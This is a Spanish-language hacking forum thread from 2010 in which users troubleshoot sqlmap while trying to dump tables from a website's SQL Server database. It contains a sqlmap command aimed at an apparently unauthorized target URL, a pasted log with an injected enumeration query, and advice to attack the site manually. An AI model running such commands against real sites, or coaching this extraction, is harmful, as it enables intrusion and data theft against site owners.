|
Título: Ayuda con Sqlmap Publicado por: N_q_N en 10 Diciembre 2010, 14:04 pm Buenas, les comento mi situación. Estoy analizando un site que podría ser vulnerable a Sql injection, utilizo Sqlmap y logro ver una DB, luego quiero extraer las Tablas y me dice que tiene 14 tablas pero me aparecen todas vacías y no puedo continuar:
Ejecuto esto: sudo ./sqlmap.py -u "http://www.SITEVULNERABLE.com/noticias_ampliar.asp?id=579" --tables -D TTBD y me salen las 14 tablas vacías.... banner: --- Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) --- current database: 'TTBD' Database: TTBD [14 tables] +--+ | | | | | | | | | | | | | | | | | | | | | | | | | | | | +--+ Título: Re: Ayuda con Sqlmap Publicado por: 3st3 en 14 Diciembre 2010, 19:39 pm Esta dificil me manda un error
[15:34:17] [INFO] retrieved: 14 [15:36:03] [INFO] performed 20 queries in 105 seconds [15:36:03] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) AND name NOT IN (SELECT TOP 0 name FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) ORDER BY name ASC) ORDER BY name ASC [15:36:03] [INFO] retrieved: [15:36:04] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request Avisa si lo has solucionado Saludos Título: Re: Ayuda con Sqlmap Publicado por: N_q_N en 14 Diciembre 2010, 20:26 pm Aún no, pero voy a intentar con alguna otra herramienta de sql i.
Y aparte sólo aparece esa BD. Gracias igual Título: Re: Ayuda con Sqlmap Publicado por: EvilGoblin en 15 Diciembre 2010, 17:11 pm probaste manualmente atacar a ver q resultados tenias?
Título: Re: Ayuda con Sqlmap Publicado por: berz3k en 18 Diciembre 2010, 07:32 am Las tablas y rows son enormes y tarda en compilar toda la info, os recomiendo encontrar el inject y de ahi partir de forma manual.
-berz3k. |